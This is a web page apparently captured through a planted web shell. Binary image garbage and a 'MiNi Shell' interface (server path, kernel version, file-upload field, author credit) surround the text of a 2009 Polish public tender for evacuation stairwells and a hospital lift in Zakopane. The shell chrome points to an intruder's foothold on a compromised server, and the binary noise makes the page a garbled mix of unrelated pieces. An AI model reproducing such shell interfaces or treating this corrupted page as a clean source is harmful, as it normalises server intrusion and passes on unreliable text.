JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090424/66737-N-2009.html

<p class="kh_header"><b>Zakopane: Modernizacja Szpitala wraz z rozwojem bazy opieki medycznej poprzez dobudowę dwóch klatek schodowych ewakuacyjnych zewnętrznych wraz z windą i wiatrołapem - zakres rzeczowy przedstawia załącznik nr 1 przedmiary robót budowlanych. 
Wojewódzki Szpital Rehabilitacyjny im. dr S. Jasińskiego w Zakopanem, ul. Ciągłówka 9, 34-500 Zakopane.</b><br>
<b>Numer ogłoszenia: 66737 - 2009; data zamieszczenia: 24.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Rehabilitacyjny im. dr S. Jasińskiego w Zakopanem , ul. Ciągłówka 9, 34-500 Zakopane, woj. małopolskie, tel. 018 2068066 w. 22, faks 018 2068141.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rehabilitacja.zakopane.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Szpitala wraz z rozwojem bazy opieki medycznej poprzez dobudowę dwóch klatek schodowych ewakuacyjnych zewnętrznych wraz z windą i wiatrołapem - zakres rzeczowy przedstawia załącznik nr 1 przedmiary robót budowlanych. 
Wojewódzki Szpital Rehabilitacyjny im. dr S. Jasińskiego w Zakopanem, ul. Ciągłówka 9, 34-500 Zakopane..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wyłonienie wykonawcy, który w wymaganym terminie do dnia 10 grudnia 2009 roku wykona roboty budowlane związane z modernizacją Wojewódzkiego Szpitala Rehabilitacyjnego im. dr S. Jasińskiego w Zakopanem, ul. Ciągłówka 9, 34-550 Zakopane, wraz z rozwojem bazy opieki medycznej poprzez dobudowę dwóch klatek schodowych ewakuacyjnych (od strony wschodniej i zachodniej) wraz z szybem windowym i wiatrołapem do budynku głównego szpitala. 
Zakres robót obejmuje roboty budowlane i instalacyjne (kanalizacja deszczowa wraz z drenażem, instalacja c.o. i elektryczna) oraz roboty budowlano - montażowe związane z montażem dźwigu szpitalnego w dobudowywanym szybie windowym do budynku głównego szpitala.

Roboty budowlane należy rozpocząć niezwłocznie po podpisaniu umowy i wykonywać je zgodnie z projektem budowlanym, wymaganiami określonymi w specyfikacji technicznej wykonywania i odbioru robót oraz sporządzonym harmonogramem robót.

Przedmiot zamówienia dokładnie jest podany w przedmiarze robót - załącznik nr 1 opracowanym na podstawie projektu budowlanego oraz w specyfikacji technicznej wykonania i odbioru robót STWiOR - załącznik nr 2.

Uwaga: Zamawiający dopuszcza rozwiązania równoważne (zastosowany materiał), jednakże na Wykonawcy spoczywa obowiązek stwierdzenia równoważności materiałów tzn. o parametrach nie gorszych niż przedstawione w projekcie.

2. Zamawiający dopuszcza składanie ofert częściowych dla dwóch następujących części (kategoria - roboty budowlane):

CZĘSĆ: A - Roboty budowlane i instalacyjne.

CZĘSĆ: B - Dźwig szpitalny - dostawa i montaż.

Wykonawca, może wziąć udział w realizacji zamówienia dla części A lub realizacji zamówienia dla części B lub też realizacji zamówienia dla części A i B łącznie.

3. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
4. Zamówienie publiczne nie jest prowadzone przy użyciu aukcji elektronicznej.
5. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom. 
Zamawiający dopuszcza możliwość powierzenia części zamówienia podwykonawcom. Informację o podwykonawcach wraz z podaniem zakresu wykonywanych przez nich robót należy podać w formularzu ofertowo - cenowym, stanowiącym załącznik nr 7.
Za roboty powierzone podwykonawcom odpowiada w pełnym zakresie wykonawca robót, który jest gwarantem.
6. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
7. Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art. 67, ust. 1 punktu 6).
8. Zamawiający uwzględnia możliwość udzielenia zamówienia dla robót dodatkowych nieprzewidzianych na podstawie art. 67, ust. 1 , punktu 5) podpunktu b) Wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego.
9. Wymagania stawiane Wykonawcy: 
a) Warunki stawiane wykonawcy są zawarte w Specyfikacji Technicznej Wykonania i Odbioru Robót - załącznik nr 2 do SIWZ.
b) Wykonawca jest w pełni odpowiedzialny za jakość i zgodność z wymaganiami przepisów prawa budowlanego, przepisów p. poż. i przepisów BHP.
c) Wymagana jest należyta staranność przy realizacji zobowiązań umowy. 
Warunki organizacyjne: roboty budowlane będą prowadzone w bezpośrednim sąsiedztwie budynku głównego Szpitala oraz częściowo w samym budynku. Roboty budowlane można wykonywać w godzinach od 7:00 rano do 22:00 wieczorem (cisza nocna od 22:00 wieczorem do 7:00 rano). Roboty można prowadzić w systemie wielozmianowym. 
Szpital w trakcie prowadzenia przedmiotowych robót budowlanych prowadzi działalność bieżącą. 
d) Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.  
e) Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń, uprawnień niezbędnych dla sprawnego i terminowego wykonania zamówienia.  
f) Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.11.12.00-0, 45.26.23.00-4, 45.26.23.10-7, 45.26.23.11-4, 45.26.23.50-9, 45.26.25.22-6, 45.26.25.00-6, 45.32.00.00-6, 45.26.11.00-5, 45.26.00.00-7, 45.42.10.00-4, 45.42.11.00-5, 45.41.00.00-4, 45.43.00.00-0, 45.43.21.12-2, 45.43.10.00-7, 45.42.11.46-9, 45.00.31.00-7, 45.23.10.30-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium.
2. Wadium wnosi się przed upływem terminu składania ofert
3. Kwoty wadium dla poszczególnych części:
Część	Kwota wadium
CZĘŚĆ: A - Roboty budowlane i instalacyjne. 7.200,00
CZĘŚĆ: B - Dźwig szpitalny - dostawa i montaż. 2.100,00
4. Forma wpłaty: 
1)	Wadium można wnieść w jednej lub w kilku następujących formach:
a)	Pieniądzu - przy czym wadium wniesione w tej formie musi zostać wpłacone na rachunek bankowy Zamawiającego i musi w dacie otwarcia przetargu być już na nim zaksięgowane.
Numer rachunku bankowego: ING Bank Śląski S.A. oZakopane 72 1050 1474 1000 0022 1051 3558
b) Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym.
c) Gwarancjach bankowych.
d) Gwarancjach ubezpieczeniowych.
e) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z poźn zm.).
5. Zwrot wadium:
1) Zamawiający zwraca niezwłocznie wadium jeżeli:
a) Upłynął termin związania ofertą. 
b) Zawarto umowę w sprawie zamówienia publicznego wniesiono zabezpieczenie należytego wykonania tej umowy.
c) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
2) Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który:
a) Wycofał ofertę przed upływem terminu składania ofert.
b) Został wykluczony z postępowania.
c) Oferta Wykonawcy została odrzucona
3) Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie wykluczenia wykonawcy lub odrzucenia oferty, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
4) Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy wskazany przez wykonawcę. 
6. Zatrzymanie wadium:
1) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie uzupełnienia dokumentów lub oświadczeń albo poprawienia błędów w dokumentach lub złożenia pełnomocnictwa w wyznaczonym terminie tego nie zrobi, chyba że udowodni że wynika to z przyczyn nie leżących po jego stronie.
2) Zamawiający zatrzymuje również wadium jeżeli wykonawca, którego oferta została wybrana:
a) Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
zawarcie umowy stało się niemożliwe z przyczyn leżących p[o stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się Wykonawcy potwierdzający spełnienie warunków na podstawie art. 22, ust. 1:
a) Posiadający uprawnienia do wykonywania określonej działalności.  
b) Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub też przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c) Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
d) Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełnienia warunków udziału w postępowaniu zostanie przeprowadzona w oparciu o oświadczenia lub dokumenty wymienione w pkt. VII niniejszej SIWZ.

2. Wykonawcy mogą wspólnie się ubiegać o udzielenie zamówienia (np. konsorcjum, spółka cywilna) ustanawiając pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo). 
W takim przypadku warunki udziału w postępowaniu dotyczące wykonawcy odnoszą się odpowiednio do wykonawców, którzy ubiegają się wspólnie o zamówienie publiczne.
Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych.
Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie.
Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.  

3. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
a) Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22, ust. 1 Prawa zamówień publicznych opisanych w ppkt. 1.a) do ppkt. 1.d).
b) Podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 Pzp.

4. Zamawiający odrzuca ofertę jeżeli:
a) Jest niezgodną z ustawą.
b) Jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Pzp.
c) Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.
d) Zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.
e) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
f) Zawiera błędy w obliczeniu ceny.
g) Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Pzp.
h) Jest nieważna na podstawie odrębnych przepisów.
Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - SPEŁNIA lub NIE SPEŁNIA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VII Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
A. W celu potwierdzenia, że Oferent posiada uprawnienia do wykonywania określonej działalności lub czynności na podstawie art. 22, ust. 1 Pzp oraz że nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp Wykonawca składa następujące oświadczenia i dokumenty:
1. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22, ust. 1 Pzp - załącznik nr 3.
2. Oświadczenie Wykonawcy zgodne z art. 24, ust. 1 i ust. 2 Pzp - załącznik nr 4.
3. Oświadczenie własne  Wykonawcy na podstawie art. 44 Pzp o zapoznaniu się z warunkami uczestniczenia w postępowaniu oraz o ich spełnieniu - załącznik           nr 5.
4. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Dokumenty potwierdzające posiadanie uprawnień lub pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
 
B. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami uprawnionymi do wykonania zamówienia należy złożyć następujące dokumenty:
1. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadający swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - załącznik nr 6. Należy podać minimum w wykazie trzy wykonane roboty budowlane spełniające warunki j.w.
 
C. Inne dokumentu, które należy złożyć w ofercie, aby oferta była ważna:
1. Formularz ofertowo cenowy - załącznik nr 7.
2. Zaakceptowany druk - wzór umowy - załącznik  nr 8.

Zamawiający żąda, aby wykonawca posiadał polisę OC od wszelkich ryzyk, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Wykonawca w terminie do 7 - miu dni po podpisaniu umowy zobowiązuje się do przedstawienie (złożenia) Zamawiającemu opłaconej polisy ubezpieczeniowej ubezpieczenia od odpowiedzialności cywilnej za szkody wyrządzone osobom trzecim w związku z prowadzonymi robotami budowlano - montażowymi na czas realizacji przedmiotu umowy do czasu odbioru końcowego sumami gwarancyjnymi:
dla części A: 120.000,00 zł,
dla części B: 30.000,00 zł.   
Okres na jaki jest zawarta polisa ubezpieczeniowa musi zostać zawarta od dnia rozpoczęcia robót budowlanych (protokół przekazania frontu robót) do dnia ostatecznego (końcowego) odbioru robót bezusterkowym protokołem odbioru ostatecznego (końcowego) robót. 

D. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
Zamiast dokumentu, o którym mowa w pkt. A4 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio że:
1) Nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) Nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniew całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3) Nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Natomiast dodatkowo składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Pzpz - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

- Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. D zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. D.   

E. Dokumenty wymagane w przypadku składania oferty wspólnej: 
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
W takim przypadku warunki udziału w postępowaniu dotyczące wykonawcy odnoszą się odpowiednio do każdego z wykonawców, którzy ubiegają się wspólnie o zamówienie publiczne (pkt.: A i B).

Natomiast dokumentami składanymi wspólnie są dokumenty wymienione w pkt. C.

Postanowienia dotyczące składanych dokumentów:
1. Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę lub osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
2. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. 
3. Wszelkie pełnomocnictwa winny być załączone do oferty w formie oryginału lub urzędowo poświadczonego odpisu pełnomocnictwa - notarialnie - zgodnie z art. 96 ustawy z 14.02.1991r.-Prawo o notariacie (Dz. U. Nr 42/2002, poz. 369 z późn. zm)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.malopolskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nalezy wejść na stronę www.malopolskie.pl na zakłądkę ZAMÓWIENIA PUBLICZNE i ZAMÓWIENIA PUBLICZNE I OGŁOSZENIA  i szukać po nazwie zamóweinia publibcznego ..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 11:00, miejsce: Wojewódzki Szpital Rehabilitacyjny im. dr S. Jasińskiego w Zakopanem, ul. Ciągłówka 9, 34-500 Zakopane /Administracja/..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘSĆ: A - Roboty budowlane i instalacyjne..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak dla głównego zapisu odnośnie opisu przedmiotu zamóweinia.

Przedmiot zamówienia dokładnie jest podany w przedmiarze robót - załącznik nr 1 opracowanym na podstawie projektu budowlanego oraz w specyfikacji technicznej wykonania i odbioru robót STWiOR - załącznik nr 2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.11.12.00-0, 45.26.23.00-4, 45.26.23.10-7, 45.26.23.11-4, 45.26.23.50-9, 45.26.25.22-6, 45.26.25.00-6, 45.32.00.00-6, 45.26.11.00-5, 45.26.00.00-7, 45.42.10.00-4, 45.42.11.00-5, 45.41.00.00-4, 45.43.00.00-0, 45.43.21.12-2, 45.43.10.00-7, 45.42.11.46-9, 45.22.30.00-7, 45.23.13.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘSĆ: B - Dźwig szpitalny - dostawa i montaż..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak dla głównego zapisu odnośnie opisu przedmiotu zamóweinia.

Przedmiot zamówienia dokładnie jest podany w przedmiarze robót - załącznik nr 1 opracowanym na podstawie projektu budowlanego oraz w specyfikacji technicznej wykonania i odbioru robót STWiOR - załącznik nr 2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.30.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com